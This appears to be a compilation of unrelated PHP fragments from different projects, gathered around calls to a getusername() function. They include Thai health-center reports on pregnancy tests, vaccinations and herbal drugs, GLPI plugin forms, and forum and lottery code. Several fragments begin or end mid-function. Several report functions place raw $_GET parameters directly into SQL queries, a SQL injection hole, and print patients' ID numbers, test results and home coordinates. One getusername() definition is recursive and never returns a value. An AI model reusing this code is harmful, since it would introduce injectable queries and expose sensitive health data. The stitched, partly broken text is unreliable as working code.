function pregtest() { //function นัด pregtest $village = $_GET[village]; if ($village == "00000000") { $wvill = ""; } else { $wvill = " AND house.villcode='{$village}' "; } if ($village == "00000000") { $mu = "ทุกหมู่บ้าน"; } else { $mu = getvillagename($village); } $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT\nperson.pcucodeperson,\nperson.pid,\nperson.idcard,\nperson.fname,\nconcat(ctitle.titlename, person.fname , ' ' , person.lname) AS pname,\nperson.birth,\nROUND(DATEDIFF(now(),person.birth)/365.25) AS age,\nhouse.villcode,\nhouse.hno,\nhouse.hcode,\nhouse.xgis,\nhouse.ygis,\nvisit.visitdate,\nvisitfp.pregtest,\nvisitfp.pregtestresult,\nvisit.username\nFROM\nhouse\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nLEFT JOIN ctitle on ctitle.titlecode = person.prename\nINNER JOIN visit ON person.pcucodeperson = visit.pcucodeperson AND person.pid = visit.pid\nINNER JOIN visitfp ON visit.pcucodeperson = visitfp.pcucodeperson AND visit.pid = visitfp.pid AND visit.visitdate = visitfp.datefp\nwhere visitfp.pregtest = '17' and visit.visitdate between '{$str}' and '{$sto}' {$wvill}\norder by visit.visitdate,person.fname"; $result = mysql_query($sql); $xml = '<markers>'; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $userv = getusername($row[username]); if ($row[pregtestresult] == "0") { $pregtestname = "ไม่ตั้งครรภ์"; } elseif ($row[pregtestresult] == "1") { $pregtestname = "ตั้งครรภ์"; } elseif ($row[pregtestresult] == "3") { $pregtestname = "แปลผลไม่ได้"; } else { $pregtestname = ""; } if ($row[visitdate] == "") { $appsick = ""; } else { $appsick = retDatets($row[visitdate]); } $xml .= '<marker '; $xml .= 'pid="' . $row[pid] . '" '; $xml .= 'pname="' . $row[pname] . '" '; $xml .= 'age="' . $row[age] . '" '; $xml .= 'hno="' . $row[hno] . '" '; $xml .= 'moo="' . $moo . '" '; $xml .= 'sick="' . $appsick . '" '; $xml .= 'labresult="' . $pregtestname . '" '; $xml .= 'userv="' . $userv . '" '; $xml .= 'lat="' . $row[ygis] . '" '; $xml .= 'lng="' . $row[xgis] . '" '; $xml .= '/>'; } $xml .= '</markers>'; echo $xml; }
function pregtest() { //function นัด pregtest $sql = "SELECT\n concat('สถานบริการ(สถานีอนามัย/PCU): ',chospital.`hosname`,' หมู่ที่:',ifnull(chospital.`mu`,'...'),' ต.',\n\tifnull(csubdistrict.`subdistname`,' ...'),' อ.',ifnull(cdistrict.`distname`,' ...'),' จ.',\n\tifnull(cprovince.`provname`,'...')) AS chospital_hosname\nFROM\n `chospital` chospital \n INNER JOIN `office` office ON chospital.`hoscode` = office.`offid`\n left outer join `csubdistrict` csubdistrict ON chospital.`provcode` = csubdistrict.`provcode`\n AND chospital.`distcode` = csubdistrict.`distcode`\n AND chospital.`subdistcode` = csubdistrict.`subdistcode`\n left outer JOIN `cdistrict` cdistrict ON chospital.`provcode` = cdistrict.`provcode`\n AND chospital.`distcode` = cdistrict.`distcode`\n INNER JOIN `cprovince` cprovince ON chospital.`provcode` = cprovince.`provcode`"; $result = mysql_query($sql); $row = mysql_fetch_array($result); $hosp = $row[chospital_hosname]; $village = $_GET[village]; if ($village == "00000000") { $wvill = ""; } else { $wvill = " AND house.villcode='{$village}' "; } if ($village == "00000000") { $mu = "ทุกหมู่บ้าน"; } else { $mu = getvillagename($village); } $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT\nperson.pcucodeperson,\nperson.pid,\nperson.idcard,\nperson.fname,\nconcat(ctitle.titlename, person.fname , ' ' , person.lname) AS pname,\nperson.birth,\nROUND(DATEDIFF(now(),person.birth)/365.25) AS age,\nhouse.villcode,\nhouse.hno,\nhouse.hcode,\nhouse.xgis,\nhouse.ygis,\nvisit.visitdate,\nvisitfp.pregtest,\nvisitfp.pregtestresult,\nvisit.username\nFROM\nhouse\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nLEFT JOIN ctitle on ctitle.titlecode = person.prename\nINNER JOIN visit ON person.pcucodeperson = visit.pcucodeperson AND person.pid = visit.pid\nINNER JOIN visitfp ON visit.pcucodeperson = visitfp.pcucodeperson AND visit.pid = visitfp.pid AND visit.visitdate = visitfp.datefp\nwhere visitfp.pregtest = '17' and visit.visitdate between '{$str}' and '{$sto}' {$wvill}\norder by visit.visitdate,person.fname"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายงานการตรวจทดสอบการตั้งครรภ์<br>'; $txt .= "ข้อมูลวันที่ {$strx} ถึง {$stox} {$mu}</b></p><b>{$hosp}</b><table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='4%' scope='col'><div align='center'>ลำดับ</th>\n\t<th width='5%' scope='col'><div align='center'>HN</th>\n <th width='10%' scope='col'><div align='center'>ชื่อ - สกุล</th>\n\t<th width='5%' scope='col'><div align='center'>อายุ</th>\n <th width='6%' scope='col'><div align='center'>บ้านเลขที่</th>\n\t<th width='4%' scope='col'><div align='center'>หมู่ที่</th>\n <th width='4%' scope='col'><div align='center'>วันที่ตรวจ</th>\n\t<th width='9%' scope='col'><div align='center'>ผลการตรวจ</th>\n\t<th width='9%' scope='col'><div align='center'>ผู้ตรวจ</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $userv = getusername($row[username]); if ($row[pregtestresult] == "0") { $pregtestname = "ไม่ตั้งครรภ์"; } elseif ($row[pregtestresult] == "1") { $pregtestname = "ตั้งครรภ์"; } elseif ($row[pregtestresult] == "3") { $pregtestname = "แปลผลไม่ได้"; } else { $pregtestname = ""; } if ($row[visitdate] == "") { $appsick = ""; } else { $appsick = retDatets($row[visitdate]); } ++$i; if ($i % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n\t<td><div align='center'>{$row['pid']}</div></td>\n <td>{$row['pname']}</td>\n\t<td><div align='center'>{$row['age']}</div></td>\n <td><div align='center'>{$row['hno']}</div></td>\n <td><div align='center'>{$moo}</div></td>\n\t<td><div align='center'>{$appsick}</div></td>\n\t<td><div align='center'>{$pregtestname}</div></td>\n\t<td><div align='left'>{$userv}</div></td>\n </tr>"; } $txt .= "</table><br>"; echo $txt; }
function getusername($tmp_username) { global $db, $db_prefix; $sql = "select * from {$db_prefix}users where username='******' "; $result = $db->get_one($sql); if (!empty($result)) { $name = getrand(); getusername($name); } else { return $tmp_username; } }
function showComments(PluginIdeaboxIdeabox $ideabox) { global $DB, $CFG_GLPI; $instID = $ideabox->fields['id']; if (!$ideabox->can($instID, "r")) { return false; } $rand = mt_rand(); $canedit = $ideabox->can($instID, 'w'); $query = "SELECT `glpi_plugin_ideabox_comments`.`name` AS name,\n `glpi_plugin_ideabox_comments`.`id`,\n `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id`,\n `glpi_plugin_ideabox_comments`.`date_comment`,\n `glpi_plugin_ideabox_comments`.`comment`,\n `glpi_plugin_ideabox_comments`.`users_id` AS users_id\n FROM `glpi_plugin_ideabox_comments` "; $query .= " LEFT JOIN `glpi_plugin_ideabox_ideaboxes`\n ON (`glpi_plugin_ideabox_ideaboxes`.`id` = `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id`)"; $query .= " WHERE `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id` = '{$instID}'\n ORDER BY `glpi_plugin_ideabox_comments`.`name`"; $result = $DB->query($query); $number = $DB->numrows($result); echo "<div class='spaced'>"; if ($canedit && $number) { Html::openMassiveActionsForm('mass' . __CLASS__ . $rand); $massiveactionparams = array(); Html::showMassiveActions(__CLASS__, $massiveactionparams); } if ($number != 0) { echo "<table class='tab_cadre_fixe'>"; echo "<tr>"; if ($canedit && $number) { echo "<th width='10'>" . Html::getCheckAllAsCheckbox('mass' . __CLASS__ . $rand) . "</th>"; } echo "<th>" . __('Name') . "</th>"; echo "<th>" . __('Author') . "</th>"; echo "<th>" . __('Date') . "</th>"; echo "<th>" . __('Content') . "</th>"; echo "</tr>"; Session::initNavigateListItems($this->getType(), PluginIdeaboxIdeabox::getTypeName(2) . " = " . $ideabox->fields["name"]); $i = 0; $row_num = 1; while ($data = $DB->fetch_array($result)) { Session::addToNavigateListItems($this->getType(), $data['id']); $i++; $row_num++; echo "<tr class='tab_bg_1 center'>"; echo "<td width='10'>"; if ($canedit) { Html::showMassiveActionCheckBox(__CLASS__, $data["id"]); } echo "</td>"; echo "<td class='center'>"; echo "<a href='" . $CFG_GLPI["root_doc"] . "/plugins/ideabox/front/comment.form.php?id=" . $data["id"] . "&plugin_ideabox_ideaboxes_id=" . $data["plugin_ideabox_ideaboxes_id"] . "'>"; echo $data["name"]; if ($_SESSION["glpiis_ids_visible"] || empty($data["name"])) { echo " (" . $data["id"] . ")"; } echo "</a></td>"; echo "<td class='center'>" . getusername($data["users_id"]) . "</td>"; echo "<td class='center'>" . Html::convdatetime($data["date_comment"]) . "</td>"; echo "<td class='left'>" . nl2br($data["comment"]) . "</td>"; echo "</tr>"; } echo "</table>"; } if ($canedit && $number) { $paramsma['ontop'] = false; Html::showMassiveActions(__CLASS__, $paramsma); Html::closeForm(); } echo "</div>"; }
$row = mysql_fetch_array($result); $hosp = $row[chospital_hosname]; $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT person.idcard\n,CONVERT(concat(ifnull(titlename,ifnull(prename,'ไม่ระบุ') ),fname,' ',lname) USING utf8) as pname \n,v.pid\n ,CONVERT(case when person.subdistcodemoi is null then 'นอกเขต' \n when person.hnomoi is null then concat(' หมู่ที่ ', person.`mumoi` ,' ต.', csd.`subdistname` )\n when person.mumoi is null then concat(person.`hnomoi` ,' ต.', csd.`subdistname` )\n else concat(person.`hnomoi` ,' หมู่ที่ ', person.`mumoi` ,' ต.', csd.`subdistname` ) end USING utf8) AS address\n ,v.rightcode,rightname,v.visitno,v.pcucode,v.visitdate,chospital.hosname,\n\t GROUP_CONCAT(concat(cdrug.drugname,'<br>')) as drugname,\n\t GROUP_CONCAT(visitdrug.unit) as unit,\n\t GROUP_CONCAT(visitdrug.dateupdate) as dateupdate,\n\t v.username,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis\nfrom visit v left join person on v.pid = person.pid and v.pcucodeperson = person.pcucodeperson\n\tleft join ctitle on person.prename = ctitle.titlecode\n left join cright on v.rightcode = cright.rightcode\n left join house on person.hcode = house.hcode and person.pcucodeperson = house.pcucode\n left join village on house.villcode = village.villcode and house.pcucode = village.pcucode\n left join csubdistrict csd on csd.provcode = left(village.villcode,2) and csd.distcode = substring(village.villcode,3,2) and csd.subdistcode = substring(village.villcode,5,2)\n\tleft join chospital on v.pcucode = chospital.hoscode\n left join visitdrug on v.visitno = visitdrug.visitno and v.pcucode = visitdrug.pcucode\n left join cdrug on visitdrug.drugcode = cdrug.drugcode\nWHERE cdrug.drugtype='10' \n \tand visitdate between '{$str}' and '{$sto}' and (v.flagservice <'04' OR v.flagservice is null OR length(trim(v.flagservice))=0 )\ngroup by v.visitno,v.pcucode\norder by visitdate,village.villcode"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายงานผู้รับบริการที่ได้รับยาสมุนไพร<br>'; $txt .= "<p div align='center' class='text-danger'>ข้อมูลระหว่างวันที่ {$strx} ถึง {$stox} </p></div></p><br>{$hosp}</b><br><table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='5%' scope='col'>ลำดับ</th>\n\t<th width='11%' scope='col'>เลขบัตรประชาชน</th>\n <th width='11%' scope='col'>ชื่อ - สกุล</th>\n\t<th width='7%' scope='col'>ที่อยู่</th>\n\t<th width='7%' scope='col'>วันที่ใช้บริการ</th>\n\t<th width='20%' scope='col'>วินิจฉัย</th>\n\t<th width='14%' scope='col'>ยาสมุนไพร</th>\n <th width='10%' scope='col'>ผู้ให้บริการ</th>\n\t<th width='6%' scope='col'>จำนวน</th>\n <th width='8%' scope='col'>วันที่บันทึกข้อมูล</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $sick = retDatets($row[visitdate]); $dupdate = retDatets($row[dateupdate]); $uname = getusername($row[username]); $sqlv = "SELECT\nvisitdiag.visitno,\nGROUP_CONCAT(concat('<br>',cdisease.diseasecode,' ',cdisease.diseasenamethai)) as diagcoded\nFROM\nvisitdiag\nINNER JOIN cdisease ON visitdiag.diagcode = cdisease.diseasecode\nwhere visitdiag.visitno = {$row['visitno']}\n\t\t\t\t\tORDER BY visitdiag.diagcode"; $resultv = mysql_query($sqlv); $rowv = mysql_fetch_array($resultv); $diagcodex = $rowv[diagcoded]; ++$x; if ($x % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$x}</div></td>\n\t<td>{$row['idcard']}</td>\n <td>{$row['pname']}</td>\n\t<td>{$row['hno']} หมู่ที่ {$moo}</td>\n <td>{$sick}</td>\n\t<td>{$diagcodex}</td>\n <td>{$row['drugname']}</td>\n\t<td>{$uname}</td>\n\t<td><div align='center'>{$row['unit']} {$row['unitsellname']}</td>\n <td>{$dupdate}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt; } else {
* Version 3 der Lizenz oder (nach Ihrer Wahl) jeder spaeteren * veroeffentlichten Version, weiterverbreiten und/oder modifizieren. * * Easy-WI wird in der Hoffnung, dass es nuetzlich sein wird, aber * OHNE JEDE GEWAEHELEISTUNG, bereitgestellt; sogar ohne die implizite * Gewaehrleistung der MARKTFAEHIGKEIT oder EIGNUNG FUER EINEN BESTIMMTEN ZWECK. * Siehe die GNU General Public License fuer weitere Details. * * Sie sollten eine Kopie der GNU General Public License zusammen mit diesem * Programm erhalten haben. Wenn nicht, siehe <http://www.gnu.org/licenses/>. */ if (!isset($admin_id) or !isset($reseller_id) or $main != 1 or isset($admin_id) and !$pa['settings'] or $reseller_id != 0) { redirect('admin.php'); } $loguserid = $admin_id; $logusername = getusername($admin_id); $logusertype = 'admin'; $logreseller = 0; $logsubuser = 0; $sprache = getlanguagefile('columns', $user_language, $reseller_id); if ($ui->w('action', 4, 'post') and !token(true)) { $template_file = $spracheResponse->token; } else { if (in_array($ui->st('d', 'get'), array('ad', 'md'))) { $id = $ui->id('id', 10, 'get'); if (in_array($ui->st('action', 'post'), array('ad', 'md'))) { $error = array(); if (!$ui->active('active', 'post')) { $error[] = 'Active'; } if (!$ui->id('length', 10, 'post')) {
<?php $user = $_SESSION[user_id]; $sql = "SELECT * FROM `user` where `user`.username = '******'"; $result = mysql_query($sql) or die(mysql_error()); $row = mysql_fetch_array($result); $mtitle = $row['prename']; $mpassword = $row['password']; $mtitlename = getTitle($row['prename']); $mfname = $row['fname']; $mlname = $row['lname']; $mname = $row['username']; $mavatar = getavatar($row['username']); $musername = getusername($row['username']); $midcard = $row['idcard']; $hospname = gethospname($row['pcucode']); $mposition = getuserposition($row['username']); ?> <section class="content-header"> <h1> ข้อมูลส่วนตัว </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">profile</li> </ol> </section> <section class="content"> <div class="row"> <div class="col-md-12"> <!-- Primary box -->
} else { if ($ip == $row['ip'] and $port == $row['port']) { $errors['ip'] = $sprache->ip; $errors['port'] = $sprache->port; } } } } if (count($errors) == 0) { if ($ui->st('action', 'post') == 'ad' and isset($rootServer)) { $query = $sql->prepare("INSERT INTO `voice_dns` (`active`,`dns`,`ip`,`port`,`tsdnsID`,`userID`,`externalID`,`resellerID`) VALUES (?,?,?,?,?,?,?,?)"); $query->execute(array($active, $dns, $ip, $port, $rootID, $userID, $externalID, $resellerLockupID)); $rowCount = $query->rowCount(); $id = $sql->lastInsertId(); if ($dns == $rootServer['defaultdns']) { $dns = strtolower($id . '-' . getusername($userID) . '.' . $rootServer['defaultdns']); $query = $sql->prepare("UPDATE `voice_dns` SET `dns`=? WHERE `dnsID`=? LIMIT 1"); $query->execute(array($dns, $id)); $rowCount += $query->rowCount(); } $loguseraction = '%add% %tsdns% ' . $ip . ':' . $port . ' ' . $dns; } else { if ($ui->st('action', 'post') == 'md' and $id and isset($rootServer)) { $query = $sql->prepare("UPDATE `voice_dns` SET `active`=?,`dns`=?,`ip`=?,`port`=?,`externalID`=? WHERE `dnsID`=? AND `resellerID`=? LIMIT 1"); $query->execute(array($active, $dns, $ip, $port, $externalID, $id, $resellerLockupID)); $rowCount = $query->rowCount(); $loguseraction = '%mod% %tsdns% ' . $ip . ':' . $port . ' ' . $dns; } } if (isset($rowCount) and $rowCount > 0) { if (isset($rootServer)) {
function showForm($ID, $options = array()) { global $CFG_GLPI; if (!$this->canView()) { return false; } if ($ID > 0) { $this->check($ID, 'r'); } else { // Create item $this->check(-1, 'w'); $this->getEmpty(); } $this->showTabs($options); $options['colspan'] = 1; $this->showFormHeader($options); echo "<tr class='tab_bg_1'>"; echo "<td>" . __('Name') . "</td>"; echo "<td>"; Html::autocompletionTextField($this, "name"); echo "</td>"; echo "</tr>"; echo "<tr class='tab_bg_1'>"; echo "<td>" . __('Associable to a ticket') . "</td><td>"; Dropdown::showYesNo('is_helpdesk_visible', $this->fields['is_helpdesk_visible']); echo "</td>"; echo "</tr>"; echo "<tr class='tab_bg_1'>"; echo "<td>" . __('Author') . "</td><td>"; if ($ID > 0) { echo getusername($this->fields["users_id"]); } else { echo getusername(Session::getLoginUserID()); } if (!empty($this->fields["date_idea"]) && !empty($ID)) { echo " - " . __('Date of submission', 'ideabox') . ": " . Html::convDateTime($this->fields["date_idea"]); } echo "<input type='hidden' name='users_id' value='" . Session::getLoginUserID() . "'>"; echo "</td>"; echo "</tr>"; echo "<tr class='tab_bg_1'>"; echo "<td colspan = '2'>"; echo "<table cellpadding='2' cellspacing='2' border='0'><tr><td>"; echo __('Description') . "</td></tr>"; echo "<tr><td class='center'>"; echo "<textarea cols='125' rows='14' name='comment'>" . $this->fields["comment"] . "</textarea>"; echo "</td></tr></table>"; echo "</td>"; echo "</tr>"; if (empty($this->fields["date_idea"])) { echo "<input type='hidden' name='date_idea' value=\"" . $_SESSION["glpi_currenttime"] . "\">"; } $this->showFormButtons($options); $this->addDivForTabs(); return true; }
} elseif ($data['action'] == "admin_adminrights_removed") { echo $locale['132'] . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_adminrights_changed") { echo $locale['133'] . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_groupadminrights_changed") { echo "Groupadminrights changed: " . getgroupname($data['subject']); } elseif ($data['action'] == "admin_blacklist_added") { echo $locale['134']; } elseif ($data['action'] == "admin_blacklist_removed") { echo $locale['135']; } elseif ($data['action'] == "admin_blacklist_changed") { echo $locale['136']; } elseif ($data['action'] == "admin_moderator_added") { echo "Moderator added:" . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_moderator_removed") { echo "Moderator removed:" . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_forumrank_added") { echo $locale['137']; } elseif ($data['action'] == "admin_forumrank_removed") { echo $locale['138']; } elseif ($data['action'] == "admin_forumrank_changed") { echo $locale['139']; } elseif ($data['action'] == "admin_adssystem_in_save") { echo "Advertising in Forum Index changed"; } elseif ($data['action'] == "admin_adssystem_vf_save") { echo "Advertising in Forum Threads changed"; } elseif ($data['action'] == "admin_banners_save") { echo $locale['140']; } elseif ($data['action'] == "admin_banners_preview") { echo $locale['141']; } elseif ($data['action'] == "admin_bbcode_enable") {
<div class="row"> <div class="col-xs-11 col-sm-11 col-md-11 col-lg-11"> <ul class="list-inline"> <li><a href="<?php echo $systemrules; ?> "><span class="glyphicon glyphicon-question-sign"></span> <?php echo _('Help'); ?> </a></li> <?php if (isloggedin() and getprivileges($_COOKIE["loguserid"]) > 0) { echo '<li><a href="admin.php"><span class="glyphicon glyphicon-cog"></span> ', _('Admin'), '</a></li>'; } if (isloggedin()) { echo '<li><span class="glyphicon glyphicon-user"></span> <small>', getusername($_COOKIE["loguserid"]), '</small>'; if (iscreditenabled()) { echo ' (<span id="usercredit" title="', _('Remaining credit'), '">', getusercredit($_COOKIE["loguserid"]), '</span> ', getcreditcurrency(), ' <button type="button" class="btn btn-success btn-xs" id="opencredit" title="', _('Add credit'), '"><span class="glyphicon glyphicon-plus"></span></button>)<span id="couponblock"><br /><span class="form-inline"><input type="text" class="form-control input-sm" id="coupon" placeholder="XXXXXX" /><button type="button" class="btn btn-primary btn-sm" id="validatecoupon" title="', _('Confirm coupon'), '"><span class="glyphicon glyphicon-plus"></span></button></span></span></li>'; } echo '<li><a href="command.php?action=logout" id="logout"><span class="glyphicon glyphicon-log-out"></span> ', _('Log out'), '</a></li>'; } ?> </ul> </div> <div class="col-xs-1 col-sm-1 col-md-1 col-lg-1"> </div> </div> <div class="row"> <div class="col-xs-11 col-sm-11 col-md-11 col-lg-11"> <h1 class="pull-left"><?php echo $systemname;
function getlastupdate($m) { global $xmlrpcerruser; $err = ""; // get the param values (should add integrity checking here) $ul = $m->getParam(0); if ($ul->kindOf() == 'struct' || $ul->kindOf() == 'array') { $arr = xmlrpc_decode($ul); foreach ($arr as $i => $username) { if (is_int($username)) { $arr[$i] = getusername($username); } } $lastupdate_a = plan_get_last_update($arr); foreach ($lastupdate_a as $i => $update) { $returnarray[$arr[$i]] = $update; } $return_a = xmlrpc_encode($returnarray); $returnval = new xmlrpcresp($return_a); // mail("*****@*****.**","update time request",$_SERVER['REMOTE_ADDR']."\n\n".print_r($ul,TRUE)."\n\n".print_r($returnarray,TRUE),"From: system@planwatch.org"); } if ($ul->kindOf() == 'scalar') { if ($ul->scalartyp() == 'int') { $username = getusername($ul->scalarval()); } else { $username = $ul->scalarval(); } list($username, $archives) = explode("___", $username); $lastact_val = plan_get_last_update($username); $returnval = new xmlrpcresp(new xmlrpcval($lastact_val, 'int')); } // if we generated an error, create an error return response if ($err) { return new xmlrpcresp(0, $xmlrpcerruser, $err); } else { // otherwise, we create the right response // with the state name return $returnval; } }
include_once "ctrl.attendance.php"; //error_reporting(E_ALL); //ini_set( 'display_errors','1'); sec_session_start(); $yr['0'] = $_SESSION['year']; $yr['1'] = $_SESSION['month']; //echo $yr['1']; $out_limit = $_SESSION['sess_user_outtime']; $in_limit = $_SESSION['sess_user_intime']; $to = $_SESSION['sess_user_id']; $rsesult = getmail($to, $db); foreach ($rsesult as $row) { $tosend = $row['email']; //echo $tosend; } $getname = getusername($_SESSION['sess_user_id'], $db); foreach ($getname as $result) { $fname = $result['user_name']; $eid = $result['user_eid']; //echo $eid; } $getCurrentMonth = getCurrentMonth($yr, $_SESSION['sess_user_id'], $db); $to_mail = implode(", ", MailList(getHeaders(1, $db), 'to', $db)); $to_cc = implode(", ", MailList(getHeaders(1, $db), 'cc', $db)); $to_bcc = implode(", ", MailList(getHeaders(1, $db), 'bcc', $db)); $body = '<html> <head><title></title> <style> td{text-align:center; border-bottom: 1px dotted #514F4F;} table{width:900px;} span{color:red;}
} elseif ($chk_ultra == "4") { $chksto = "and tmp.vitalcheck is null"; } else { $chksto = ""; } $str = retDate($_GET[str]); $sto = retDate($_GET[sto]); $ovyear = substr($sto, 0, 4); $sql = "SELECT\nperson.pcucodeperson,\nperson.pid,\nperson.idcard,\nCONVERT(concat(ifnull(ctitle.titlename,ifnull(person.prename,'ไม่ระบุ') ),person.fname,' ' ,person.lname) using utf8) as pname,\nctitle.titlename,\nperson.fname,\nperson.lname,\nperson.birth,\ngetageyearnum(person.birth,'{$str}') AS age,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis,\nhouse.usernamedoc,\nvisitepi.vaccinecode,\nvisitepi.dateepi\nFROM\nvillage\nINNER JOIN house ON village.pcucode = house.pcucode AND village.villcode = house.villcode\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nINNER JOIN visitepi ON person.pcucodeperson = visitepi.pcucodeperson AND person.pid = visitepi.pid\nINNER JOIN ctitle ON person.prename = ctitle.titlecode\nWHERE visitepi.vaccinecode in ('dT1','dTs1') and visitepi.dateepi between '{$str}' and '{$sto}' {$wvill}\nORDER BY house.villcode asc ,house.hno*1 asc,getageyearnum(person.birth,'{$str}') desc\n"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายชื่อผู้รับบริการฉีดวัคซีน dT1 และ dTs1 '; $txt .= "<br>ข้อมูลระหว่างวันที่ {$_GET['str']} ถึง {$_GET['sto']} {$mu} </b></p><b>{$hosp}</b><table width='99%' border='0' cellspacing='1' cellpadding='1' class='tbhl'>\n <tr>\n <th width='4%' scope='col'>ลำดับ</th>\n\t<th width='5%' scope='col'>HN</th>\n\t<th width='10%' scope='col'>เลขบัตรประชาชน</th>\n <th width='10%' scope='col'>ชื่อ - สกุล</th>\n\t<th width='5%' scope='col'>อายุ</th>\n <th width='6%' scope='col'>บ้านเลขที่</th>\n <th width='4%' scope='col'>หมู่ที่</th>\n <th width='8%' scope='col'>วันที่ฉีดวัคซีน</th>\n\t<th width='13%' scope='col'>ชนิดวัคซีน</th>\n\t<th width='12%' scope='col'>นสค.</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $nsk = getusername($row[usernamedoc]); if ($row[dateepi] == "") { $sick = ""; } else { $sick = retDatets($row[dateepi]); } ++$i; if ($i % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n\t<td><div align='center'>{$row['pid']}</div></td>\n\t<td><div align='center'>{$row['idcard']}</div></td>\n <td>{$row['pname']}</td>\n\t<td><div align='center'>{$row['age']}</div></td>\n <td><div align='center'>{$row['hno']}</div></td>\n <td><div align='center'>{$moo}</div></td>\n <td><div align='center'>{$sick}</div></td>\n\t<td><div align='center'>{$row['vaccinecode']}</div></td>\n\t<td>{$nsk}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt;
//判断用户今天是否参与过摇奖 if (dgmdate($_G['timestamp'], 'Ymd', $_G['setting']['timeoffset']) <= dgmdate($zzza_lasttime_dateline, 'Ymd', $_G['setting']['timeoffset'])) { exit('Access Denied'); } //是否初始化获得积分 $initialization_mark = DB::result_first("SELECT value FROM " . DB::table('yinxingfei_zzza_mark') . " WHERE uid = '" . $_G['uid'] . "'"); $initialization_mark = empty($initialization_mark) ? 0 : $initialization_mark; //0:未初始化 //1:已经初始化 if ($initialization_mark == 0) { $range1percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '1'"); $range2percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '2'"); $range3percentage = DB::result_first("SELECT percentage FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '3'"); $rangeid = get_rand(array($range1percentage, $range2percentage, $range3percentage)); $rangeid = $rangeid + 1; $rangeab = DB::fetch_first("SELECT min,max FROM " . DB::table('yinxingfei_zzza_range') . " WHERE id = '" . $rangeid . "'"); $initialization_extcredit = mt_rand($rangeab['min'], $rangeab['max']); $today_extcredit = $initialization_extcredit; $zzzadata['uid'] = $_G['uid']; $zzzadata['username'] = getusername($_G['uid']); $zzzadata['today_extcredit'] = $initialization_extcredit; DB::insert('yinxingfei_zzza_rank', $zzzadata, false, true); //更新插入数据 //防止用户通过多浏览器不断刷新刷积分代码,我们就通过初始化记录为准,不管刷新多少次都是调用初始化 $newmark = array('uid' => $_G['uid'], 'value' => 1); DB::insert('yinxingfei_zzza_mark', $newmark, false, true); } else { $today_extcredit = $zzzadata['today_extcredit']; } $today_extcredit = sprintf("%03d", $today_extcredit); exit($today_extcredit);
/** * Show for PDF an resources * * @param $pdf object for the output * @param $ID of the resources */ function show_PDF($pdf) { $pdf->setColumnsSize(50, 50); $col1 = '<b>' . __('ID') . ' ' . $this->fields['id'] . '</b>'; if (isset($this->fields["date_declaration"])) { $users_id_recipient = new User(); $users_id_recipient->getFromDB($this->fields["users_id_recipient"]); $col2 = __('Request date') . ' : ' . Html::convDateTime($this->fields["date_declaration"]) . ' ' . __('Requester') . ' ' . $users_id_recipient->getName(); } else { $col2 = ''; } $pdf->displayTitle($col1, $col2); $pdf->displayLine('<b><i>' . __('Name') . ' :</i></b> ' . $this->fields['name'], '<b><i>' . __('First name') . ' :</i></b> ' . $this->fields['firstname']); $pdf->displayLine('<b><i>' . __('Location') . ' :</i></b> ' . Html::clean(Dropdown::getDropdownName('glpi_locations', $this->fields['locations_id'])), '<b><i>' . PluginResourcesContractType::getTypeName(1) . ' :</i></b> ' . Html::clean(Dropdown::getDropdownName('glpi_plugin_resources_contracttypes', $this->fields['plugin_resources_contracttypes_id']))); $pdf->displayLine('<b><i>' . __('Resource manager', 'resources') . ' :</i></b> ' . Html::clean(getusername($this->fields["users_id"])), '<b><i>' . PluginResourcesDepartment::getTypeName(1) . ' :</i></b> ' . Html::clean(Dropdown::getDropdownName('glpi_plugin_resources_departments', $this->fields["plugin_resources_departments_id"]))); $pdf->displayLine('<b><i>' . __('Arrival date', 'resources') . ' :</i></b> ' . Html::convDate($this->fields["date_begin"]), '<b><i>' . __('Departure date', 'resources') . ' :</i></b> ' . Html::convDate($this->fields["date_end"])); $pdf->setColumnsSize(100); 